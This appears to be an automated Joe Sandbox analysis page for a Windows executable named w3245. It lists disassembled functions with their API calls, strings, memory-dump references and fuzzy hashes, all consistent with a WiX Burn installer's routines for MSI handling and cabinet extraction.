                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                              • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                              • API String ID: 2619879409-373955632
                                                                                                                                                              • Opcode ID: 4571dfbd88f51dfdbe770e42d1c77934ec021b66cda632fb4dfe8c8c6668aa81
                                                                                                                                                              • Instruction ID: 828903e6fdaf9003cb8095c244218f8a46475b4d970c8088590e24f2d387bd40
                                                                                                                                                              • Opcode Fuzzy Hash: 4571dfbd88f51dfdbe770e42d1c77934ec021b66cda632fb4dfe8c8c6668aa81
                                                                                                                                                              • Instruction Fuzzy Hash: 7341C676140241ABDB629E199D49F1B3BA9FBC5720F21C02DFA18DB382D739C801DBA1
                                                                                                                                                              Function 00802AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1546 802af7-802b17 call 7c3838 1549 802c21-802c25 1546->1549 1550 802b1d-802b2b call 804a6c 1546->1550 1552 802c27-802c2a call 805636 1549->1552 1553 802c2f-802c35 1549->1553 1554 802b30-802b4f GetProcAddress 1550->1554 1552->1553 1556 802b51 1554->1556 1557 802b56-802b6f GetProcAddress 1554->1557 1556->1557 1558 802b71 1557->1558 1559 802b76-802b8f GetProcAddress 1557->1559 1558->1559 1560 802b91 1559->1560 1561 802b96-802baf GetProcAddress 1559->1561 1560->1561 1562 802bb1 1561->1562 1563 802bb6-802bcf GetProcAddress 1561->1563 1562->1563 1564 802bd1 1563->1564 1565 802bd6-802bef GetProcAddress 1563->1565 1564->1565 1566 802bf1 1565->1566 1567 802bf6-802c10 GetProcAddress 1565->1567 1566->1567 1568 802c12 1567->1568 1569 802c17 1567->1569 1568->1569 1569->1549
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C3838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C3877
                                                                                                                                                                • Part of subcall function 007C3838: GetLastError.KERNEL32 ref: 007C3881
                                                                                                                                                                • Part of subcall function 00804A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00804A9D
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00802B41
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00802B61
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00802B81
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00802BA1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00802BC1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00802BE1
                                                                                                                                                              • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00802C01
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                              • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                              • API String ID: 2510051996-1735120554
                                                                                                                                                              • Opcode ID: 2f386c5db4cbd6c66b819711d3dfb6a601181932b92483ee0c00546a8a9b7bf1
                                                                                                                                                              • Instruction ID: f4dd3cbdf7eda524046bc29b08e9fb710500fb6a89e04db98b522fe946fc2734
                                                                                                                                                              • Opcode Fuzzy Hash: 2f386c5db4cbd6c66b819711d3dfb6a601181932b92483ee0c00546a8a9b7bf1
                                                                                                                                                              • Instruction Fuzzy Hash: A33108B0943618EFDB619F20FD06B2A7BA5FB34314F00812AE414966B0F7B5489BEF54
                                                                                                                                                              Function 007E1741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,007CC3EB,?,00000000,?,007CC47F), ref: 007E1778
                                                                                                                                                              • GetLastError.KERNEL32(?,007CC3EB,?,00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007E1781
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorEventLast
                                                                                                                                                              • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                              • API String ID: 545576003-938279966
                                                                                                                                                              • Opcode ID: 0202a733301de951f37a906aeb396207876a9574abaa845bde09c66b617543f0
                                                                                                                                                              • Instruction ID: 94a60c319ba469ac9269df278d87441d0b063d9913e46185ddb753f034283a80
                                                                                                                                                              • Opcode Fuzzy Hash: 0202a733301de951f37a906aeb396207876a9574abaa845bde09c66b617543f0
                                                                                                                                                              • Instruction Fuzzy Hash: 6521F677D4367676D32116A68C47F6B6A9CFF08BB0B424225BD11FB680E67CDC4085E1
                                                                                                                                                              Function 007FFCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 007FFCD6
                                                                                                                                                              • GetProcAddress.KERNEL32(SystemFunction041), ref: 007FFCE8
                                                                                                                                                              • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 007FFD2B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007FFD3F
                                                                                                                                                              • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 007FFD77
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007FFD8B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$ErrorLast
                                                                                                                                                              • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                                                                                                              • API String ID: 4214558900-3191127217
                                                                                                                                                              • Opcode ID: a45db6738bd6fa7031777047ccff098f02d1fde14a68ec931269feff38800b11
                                                                                                                                                              • Instruction ID: 130287564278bd658f8def08935bfa9bb58da67c13e7523b0c2b2fde1d08f6aa
                                                                                                                                                              • Opcode Fuzzy Hash: a45db6738bd6fa7031777047ccff098f02d1fde14a68ec931269feff38800b11
                                                                                                                                                              • Instruction Fuzzy Hash: F921C832A4267A97C3319B15AE1AB266B90FF00B50F054135EE10EE3A0FF7C9C41DAE0
                                                                                                                                                              Function 007E08C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 007E08F2
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 007E090A
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 007E090F
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 007E0912
                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 007E091C
                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 007E098B
                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 007E0998
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to duplicate handle to cab container., xrefs: 007E094A
                                                                                                                                                              • Failed to open cabinet file: %hs, xrefs: 007E09C9
                                                                                                                                                              • <the>.cab, xrefs: 007E08EB
                                                                                                                                                              • cabextract.cpp, xrefs: 007E0940, 007E09BC
                                                                                                                                                              • Failed to add virtual file pointer for cab container., xrefs: 007E0971
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                              • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                              • API String ID: 3030546534-3446344238
                                                                                                                                                              • Opcode ID: 2ae51bd35203da012259842651041263bdb4dc03b03b350ad9022a6c401a8e93
                                                                                                                                                              • Instruction ID: 84291e7c5a7716c55b2bd5ecc42433e4ea7a1890bb87755e9b282ffa8d399993
                                                                                                                                                              • Opcode Fuzzy Hash: 2ae51bd35203da012259842651041263bdb4dc03b03b350ad9022a6c401a8e93
                                                                                                                                                              • Instruction Fuzzy Hash: 4F31E172942636BBEB215A968C49F9ABA6CFF08770F110115FE04F7242D768AC408AE1
                                                                                                                                                              Function 007D6A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,007C4E11,?,?), ref: 007D6A77
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?,007C4E11,?,?), ref: 007D6A7D
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,?,007C4E11,?,?), ref: 007D6A80
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007C4E11,?,?), ref: 007D6A8A
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,007C4E11,?,?), ref: 007D6B03
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to duplicate file handle for attached container., xrefs: 007D6AB8
                                                                                                                                                              • core.cpp, xrefs: 007D6AAE
                                                                                                                                                              • %ls -%ls=%u, xrefs: 007D6AD7
                                                                                                                                                              • Failed to append the file handle to the command line., xrefs: 007D6AEB
                                                                                                                                                              • burn.filehandle.attached, xrefs: 007D6AD0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                              • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                                                                                                                              • API String ID: 4224961946-4196573879
                                                                                                                                                              • Opcode ID: 67ded8f258a157b63c7ff893bd4666efba8831c0783ebefc6e2501b0a6fdde22
                                                                                                                                                              • Instruction ID: 9f7b9bd5d1c00e2ef80c98d3e228ea8303764a95dc596a8d896a121ac1073564
                                                                                                                                                              • Opcode Fuzzy Hash: 67ded8f258a157b63c7ff893bd4666efba8831c0783ebefc6e2501b0a6fdde22
                                                                                                                                                              • Instruction Fuzzy Hash: 5F118472A41625FBCB10ABA89D09E9E7B68EF45730F118266F920F73D0D7789D0096D0
                                                                                                                                                              Function 008032F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00803309
                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00803325
                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 008033AC
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 008033B7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: `<u$xmlutil.cpp
                                                                                                                                                              • API String ID: 760788290-3482516102
                                                                                                                                                              • Opcode ID: aae71d01c145bcb19e28fb03d0079607de55b2708df7ccf3e3e752143be53af7
                                                                                                                                                              • Instruction ID: 1085461ef0e9205c528b51ab87cbd24eabf10b412d81eeafffec7266dd1c8ab9
                                                                                                                                                              • Opcode Fuzzy Hash: aae71d01c145bcb19e28fb03d0079607de55b2708df7ccf3e3e752143be53af7
                                                                                                                                                              • Instruction Fuzzy Hash: 4C216B32901219ABCB619B94DC89EAEBBB9FF44B15F16415CF901EB360DB319E008B90
                                                                                                                                                              Function 00800879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcessToken.ADVAPI32(?,00000008,?,007C53BD,00000000,?,?,?,?,?,?,?,007D769D,00000000), ref: 00800897
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,007D769D,00000000), ref: 008008A1
                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,007D769D,00000000), ref: 008008D3
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,007D769D,00000000), ref: 008008EC
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,007D769D,00000000), ref: 0080092B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                              • String ID: procutil.cpp
                                                                                                                                                              • API String ID: 4040495316-1178289305
                                                                                                                                                              • Opcode ID: e50fb79b62839a1b050c97485ea87d166756cea66214a05a04f56ed9553c8286
                                                                                                                                                              • Instruction ID: cf42080d34457c004446aae5ab330db047c453db14985d72d0c32fdbde533cb4
                                                                                                                                                              • Opcode Fuzzy Hash: e50fb79b62839a1b050c97485ea87d166756cea66214a05a04f56ed9553c8286
                                                                                                                                                              • Instruction Fuzzy Hash: 9921A132E4062AEBEB619B958C05B9EFFA8FF10711F118166AD14EB390D3708E00DED0
                                                                                                                                                              Function 007D6B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 007D6B49
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007D6BB9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                              • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                                                                                                              • API String ID: 3498533004-3263533295
                                                                                                                                                              • Opcode ID: 2bc5165f0d029c55d47a97ec3a967203351f3a4f4b7cdaef32a532bcc2bdb4fc
                                                                                                                                                              • Instruction ID: f0f4a003a2e7965dd89b2da26d7a82648b7d00ac78100c738c71bb5aab876298
                                                                                                                                                              • Opcode Fuzzy Hash: 2bc5165f0d029c55d47a97ec3a967203351f3a4f4b7cdaef32a532bcc2bdb4fc
                                                                                                                                                              • Instruction Fuzzy Hash: 9011D372600614BBDB215A68DC06F9B7BACEF45B30F214366FD34EB3E1D3B888118691
                                                                                                                                                              Function 00803565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00803574
                                                                                                                                                              • InterlockedIncrement.KERNEL32(0082B6C8), ref: 00803591
                                                                                                                                                              • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0082B6B8,?,?,?,?,?,?), ref: 008035AC
                                                                                                                                                              • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0082B6B8,?,?,?,?,?,?), ref: 008035B8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                              • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                              • API String ID: 2109125048-2356320334
                                                                                                                                                              • Opcode ID: a6e102559358c0298718112b339bb2bfaf7de74d018fbfe0dccc2d4079bfe34c
                                                                                                                                                              • Instruction ID: 8d4adc0c7b8b5e368d773a8d22dc46f9d3d4b3935c04875ca136a2be5903c051
                                                                                                                                                              • Opcode Fuzzy Hash: a6e102559358c0298718112b339bb2bfaf7de74d018fbfe0dccc2d4079bfe34c
                                                                                                                                                              • Instruction Fuzzy Hash: 6BF0E530742236ABC3A11BA27D09B073EADFB90B64F100529EC10D23F0D360D98186B0
                                                                                                                                                              Function 00804A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00804A9D
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00804ACA
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00804AF6
                                                                                                                                                              • GetLastError.KERNEL32(00000000,0080B7A0,?,00000000,?,00000000,?,00000000), ref: 00804B34
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00804B65
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 1145190524-2967768451
                                                                                                                                                              • Opcode ID: 6dafe8ff1518108b38998bffefaf65f0a6e3351be325b173841ceece7d5094f1
                                                                                                                                                              • Instruction ID: 157d84ba9b006914224be096cc1901c4492d194e113b9ae719a73ae8431173fe
                                                                                                                                                              • Opcode Fuzzy Hash: 6dafe8ff1518108b38998bffefaf65f0a6e3351be325b173841ceece7d5094f1
                                                                                                                                                              • Instruction Fuzzy Hash: BB31C4B6E80239ABD7629AD98C41FAFBAA8FF44760F114155FE14E7381E731DC0086E0
                                                                                                                                                              Function 007E0A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 007E0B27
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?), ref: 007E0B31
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to move file pointer 0x%x bytes., xrefs: 007E0B62
                                                                                                                                                              • Invalid seek type., xrefs: 007E0ABD
                                                                                                                                                              • cabextract.cpp, xrefs: 007E0B55
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                              • API String ID: 2976181284-417918914
                                                                                                                                                              • Opcode ID: 6abe44a0d04d59f33f093510e59fd8ccf9530c2e081dde46e4217cfb8ac42d05
                                                                                                                                                              • Instruction ID: dbf04ff7d39908477b2fbae0200e7c507bfd86fd63b2bda8dfaff3576b492c22
                                                                                                                                                              • Opcode Fuzzy Hash: 6abe44a0d04d59f33f093510e59fd8ccf9530c2e081dde46e4217cfb8ac42d05
                                                                                                                                                              • Instruction Fuzzy Hash: 9D31B071A4125AEFCB15CF99CC85EAEB769FF08724B048225F914E7250D374ED508BD0
                                                                                                                                                              Function 007C4115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?), ref: 007C4123
                                                                                                                                                              • GetLastError.KERNEL32(?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?,00000000,00000000), ref: 007C4131
                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,840F01E8,007C5489,?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?,00000000), ref: 007C419A
                                                                                                                                                              • GetLastError.KERNEL32(?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?,00000000,00000000), ref: 007C41A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
